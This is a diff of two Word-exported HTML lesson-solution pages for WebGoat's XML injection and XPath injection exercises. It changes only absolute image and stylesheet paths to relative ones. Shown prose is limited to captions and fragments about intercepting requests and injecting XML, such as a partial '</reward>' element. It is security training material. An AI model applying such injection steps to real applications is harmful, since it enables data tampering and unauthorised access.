<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/XMLInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/XMLInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/XMLInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/XMLInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/XMLInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/XMLInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/XMLInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -663,9 +663,9 @@ ID is 836239.<o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_61" o:spid="_x0000_i1032" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image017.jpg" v:shapes="Picture_x0020_61"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image017.jpg" v:shapes="Picture_x0020_61"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -689,9 +689,9 @@ intercept the HTTP Request and HTTP Response using WebScarab.<o:p></o:p></span><
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_62" o:spid="_x0000_i1031"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image018.jpg" v:shapes="Picture_x0020_62"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image018.jpg" v:shapes="Picture_x0020_62"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -705,9 +705,9 @@ field-end'></span><![endif]--> Enter account number</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_63" o:spid="_x0000_i1030"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/XMLInjection_files/image019.jpg" v:shapes="Picture_x0020_63"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image019.jpg" v:shapes="Picture_x0020_63"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -721,9 +721,9 @@ field-end'></span><![endif]--> Intercepted HTTP Request</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_64" o:spid="_x0000_i1029"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image007.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image007.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/XMLInjection_files/image020.jpg" v:shapes="Picture_x0020_64"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image020.jpg" v:shapes="Picture_x0020_64"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -776,9 +776,9 @@ Pts&lt;/reward&gt;</span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_68" o:spid="_x0000_i1028"
type="#_x0000_t75" style='width:481.5pt;height:345pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image009.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image009.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=642 height=460
src="/WebGoat/lesson_solutions/XMLInjection_files/image021.jpg" v:shapes="Picture_x0020_68"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image021.jpg" v:shapes="Picture_x0020_68"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -797,9 +797,9 @@ do this three times!<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_65" o:spid="_x0000_i1027"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image011.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image011.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image022.jpg" v:shapes="Picture_x0020_65"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image022.jpg" v:shapes="Picture_x0020_65"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -813,9 +813,9 @@ field-end'></span><![endif]--> Injected XML results</p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_66" o:spid="_x0000_i1026"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image013.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image013.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image023.jpg" v:shapes="Picture_x0020_66"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image023.jpg" v:shapes="Picture_x0020_66"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -834,9 +834,9 @@ Laptop and the Cruise and click "Submit".<o:p></o:p></span></p>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_67" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XMLInjection_files/image015.png" o:title=""/>
<v:imagedata src="lesson_solutions/XMLInjection_files/image015.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XMLInjection_files/image024.jpg" v:shapes="Picture_x0020_67"><![endif]></span></p>
src="lesson_solutions/XMLInjection_files/image024.jpg" v:shapes="Picture_x0020_67"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC


@ -9,8 +9,8 @@ xmlns="http://www.w3.org/TR/REC-html40">
<meta name=ProgId content=Word.Document>
<meta name=Generator content="Microsoft Word 12">
<meta name=Originator content="Microsoft Word 12">
<link rel=File-List href="/WebGoat/lesson_solutions/XPATHInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="/WebGoat/lesson_solutions/XPATHInjection_files/editdata.mso">
<link rel=File-List href="lesson_solutions/XPATHInjection_files/filelist.xml">
<link rel=Edit-Time-Data href="lesson_solutions/XPATHInjection_files/editdata.mso">
<!--[if !mso]>
<style>
v\:* {behavior:url(#default#VML);}
@ -36,8 +36,8 @@ w\:* {behavior:url(#default#VML);}
<o:Version>12.00</o:Version>
</o:DocumentProperties>
</xml><![endif]-->
<link rel=themeData href="/WebGoat/lesson_solutions/XPATHInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="/WebGoat/lesson_solutions/XPATHInjection_files/colorschememapping.xml">
<link rel=themeData href="lesson_solutions/XPATHInjection_files/themedata.thmx">
<link rel=colorSchemeMapping href="lesson_solutions/XPATHInjection_files/colorschememapping.xml">
<!--[if gte mso 9]><xml>
<w:WordDocument>
<w:Zoom>90</w:Zoom>
@ -702,9 +702,9 @@ mso-fareast-language:JA'><o:p></o:p></span></p>
<o:lock v:ext="edit" aspectratio="t"/>
</v:shapetype><v:shape id="Picture_x0020_141" o:spid="_x0000_i1027" type="#_x0000_t75"
style='width:480pt;height:277.5pt;visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XPATHInjection_files/image001.png" o:title=""/>
<v:imagedata src="lesson_solutions/XPATHInjection_files/image001.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XPATHInjection_files/image007.jpg" v:shapes="Picture_x0020_141"><![endif]></span></p>
src="lesson_solutions/XPATHInjection_files/image007.jpg" v:shapes="Picture_x0020_141"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -735,9 +735,9 @@ bold'><o:p>&nbsp;</o:p></span></p>
"Arial","sans-serif";mso-no-proof:yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_142"
o:spid="_x0000_i1026" type="#_x0000_t75" style='width:480pt;height:277.5pt;
visibility:visible;mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XPATHInjection_files/image003.png" o:title=""/>
<v:imagedata src="lesson_solutions/XPATHInjection_files/image003.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XPATHInjection_files/image008.jpg" v:shapes="Picture_x0020_142"><![endif]></span></p>
src="lesson_solutions/XPATHInjection_files/image008.jpg" v:shapes="Picture_x0020_142"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC
@ -760,9 +760,9 @@ And this is how the server interprets it:<br>
yes'><!--[if gte vml 1]><v:shape id="Picture_x0020_143" o:spid="_x0000_i1025"
type="#_x0000_t75" style='width:480pt;height:277.5pt;visibility:visible;
mso-wrap-style:square'>
<v:imagedata src="/WebGoat/lesson_solutions/XPATHInjection_files/image005.png" o:title=""/>
<v:imagedata src="lesson_solutions/XPATHInjection_files/image005.png" o:title=""/>
</v:shape><![endif]--><![if !vml]><img width=640 height=370
src="/WebGoat/lesson_solutions/XPATHInjection_files/image009.jpg" v:shapes="Picture_x0020_143"><![endif]></span></p>
src="lesson_solutions/XPATHInjection_files/image009.jpg" v:shapes="Picture_x0020_143"><![endif]></span></p>
<p class=MsoCaption>Figure <!--[if supportFields]><span style='mso-element:
field-begin'></span><span style='mso-spacerun:yes'> </span>SEQ Figure \* ARABIC